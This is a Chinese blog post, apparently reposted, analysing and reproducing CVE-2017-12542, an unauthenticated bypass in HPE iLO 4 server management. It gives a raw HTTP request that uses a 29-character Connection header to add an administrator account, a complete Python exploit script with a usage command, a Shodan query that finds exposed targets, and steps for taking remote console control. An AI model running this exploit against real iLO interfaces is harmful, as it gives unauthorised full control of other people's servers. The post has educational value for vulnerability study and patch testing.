CVE-2017-12542简单分析及复现

简介

CVE-2017-12542 是一个 CVSS 9.8 的高分漏洞,漏洞利用条件简单,危害较大。近十年来,iLO是几乎所有惠普服务器中都嵌入的服务器管理解决方案。它通过远程管理的方式为系统管理员提供了需要的功能。包括电源管理,远程系统控制台,远程CD/DVD映像安装等。HPE Integrated Lights-Out 4(iLO 4)中的漏洞可能允许未经身份验证的远程攻击者绕过验证并执行任意代码

CVE-2017-12542简单分析及复现

简要分析

一般,iLO的登录界面如下图所示:

CVE-2017-12542简单分析及复现

当访问

https://127.0.0.1:8443/rest/v1/AccountService/Accounts

时,会返回 HTTP/1.1 401 Unauthorized

CVE-2017-12542简单分析及复现

在HTTP头的 Connection 中添加大于等于 29 个字符后,即可绕过验证(下图为成功获取到目标的iLO登录用户名):

CVE-2017-12542简单分析及复现

向目标 post 添加用户的数据包,且 Connection 仍然用 29个A ,即可成功添加用户:

POST /rest/v1/AccountService/Accounts HTTP/1.1
Host: 127.0.0.1:8443
Content-Length: 273
Accept-Encoding: gzip, deflate
Accept: */*
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: application/json

{"UserName": "administratar", "Password": "admin@123", "Oem": {"Hp": {"Privileges": {"RemoteConsolePriv": true, "iLOConfigPriv": true, "VirtualMediaPriv": true, "UserConfigPriv": true, "VirtualPowerAndResetPriv": true, "LoginPriv": true}, "LoginName": "administratar"}}}

CVE-2017-12542简单分析及复现

添加的用户可登陆成功,且有完整的控制权限:

CVE-2017-12542简单分析及复现

复现及利用

在shodan以 HP-iLO-Server关键词搜索结果大概有8800个,主要分布在美国、香港、英国等。

CVE-2017-12542简单分析及复现

我们可以使用 skelsec的PoC 对目标进行验证:

#!/usr/bin/env python

"""
Exploit trigger was presented @reconbrx 2018

Vulnerability found and documented by synacktiv:

https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html

Original advisory from HP:

https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us

Other advisories for this CVE:

https://tools.cisco.com/security/center/viewAlert.x?alertId=54930

https://securitytracker.com/id/1039222

http://www.exploit-db.com/exploits/44005

https://packetstormsecurity.com/files/146303/HPE-iLO4-Add-New-Administrator-User.html

https://vulndb.cyberriskanalytics.com/164082

IMPORTANT: 
THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITES COVERED BY CVE-2017-12542!!!
The two other vulns are critical as well, but only triggerable on the host itself.


"""

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import json
import urllib3

# All of the HP iLO interfaces run on HTTPS, but most of them are using self-signed SSL cert.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

exploit_trigger = {'Connection' : 'A'*29}
accounts_url = 'https://%s/rest/v1/AccountService/Accounts'



def test(ip):

    url = accounts_url % ip
    try:
        response = requests.get(url, headers = exploit_trigger, verify = False)
    except Exception as e:
        return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))

    try:
        data = json.loads(response.text)
    except Exception as e:
        return False, 'Target response not as expected!, Exception data: %s' % (str(e),)

    return True, data

def exploit(ip, username, password):
    Oem = {
        'Hp' : {
            'LoginName' : username,
            'Privileges': {
                'LoginPriv' : True,
                'RemoteConsolePriv': True,
                'UserConfigPriv' : True,
                'VirtualMediaPriv': True,
                'iLOConfigPriv':True,
                'VirtualPowerAndResetPriv':True,
            }
        }
    }
    body = {
        'UserName':username,
        'Password':password,
        'Oem':Oem
    }
    url = accounts_url % ip



    try:
        response = requests.post(url, json=body, headers = exploit_trigger, verify = False)
    except Exception as e:
        return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))

    if response.status_code in [requests.codes.ok, requests.codes.created]:
        return True, response.text
    else:
        return False, 'Server returned status code %d, data: %s' % (response.status_code, response.text)

if __name__ == '__main__':
    import argparse
    import sys
    parser = argparse.ArgumentParser(description='CVE-2017-12542 Tester and Exploiter script.')
    parser.add_argument('ip', help='target IP')
    parser.add_argument('-t', action='store_true', default=True, help='Test. Trigger the exploit and list all users')
    parser.add_argument('-e', action='store_true', default=False, help='Exploit. Create a new admin user with the credentials specified in -u and -p')
    parser.add_argument('-u', help='username of the new admin user')
    parser.add_argument('-p', help='password of the new admin user')

    args = parser.parse_args()

    if args.e:
        if args.u is None or args.p is None:
            print('Username and password must be set for exploiting!')
            sys.exit()
        res, data = exploit(args.ip, args.u, args.p)
        if res:
            print('[+] Successfully added user!')
        else:
            print('[-] Error! %s' % data)

    elif args.t:
        res, data = test(args.ip)
        if res:
            print('[+] Target is VULNERABLE!')
            for i in data['Items']:
                print('[+] Account name: %s Username: %s' % (i['Name'], i['Oem']['Hp']['LoginName']))
        else:
            print('[-] Error! %s' % data)

用法如下:

python hp_iLO_4_exp-CVE-2017-12542.py -e -u administratar -p admin@123 ip:port

即可添加用户名为administratar 密码为admin@123的用户:

CVE-2017-12542简单分析及复现

使用hp的 HP iLO Integrated Remote Console 可以对目标进行远程链接,下载地址为: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_4f842ceb31cf48d392e22705a8 有两种方式连接目标:

1、打开 HP iLO Integrated Remote Console ,在弹出的提示窗中填入相应的信息。

CVE-2017-12542简单分析及复现

2、在主页的 information -> overview ->点击 Java Web Start 会下载一个 jnlp 文件,打开即可自动连接。

CVE-2017-12542简单分析及复现

连接后可获取对目标的完整控制:

CVE-2017-12542简单分析及复现

原文 

http://www.freebuf.com/vuls/167124.html

本站部分文章源于互联网,本着传播知识、有益学习和研究的目的进行的转载,为网友免费提供。如有著作权人或出版方提出异议,本站将立即删除。如果您对文章转载有任何疑问请告之我们,以便我们及时纠正。

PS:推荐一个微信公众号: askHarries 或者qq群:474807195,里面会分享一些资深架构师录制的视频录像:有Spring,MyBatis,Netty源码分析,高并发、高性能、分布式、微服务架构的原理,JVM性能优化这些成为架构师必备的知识体系。还能领取免费的学习资源,目前受益良多

转载请注明原文出处:Harries Blog™ » CVE-2017-12542简单分析及复现

赞 (0)
分享到:更多 ()

评论 0

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址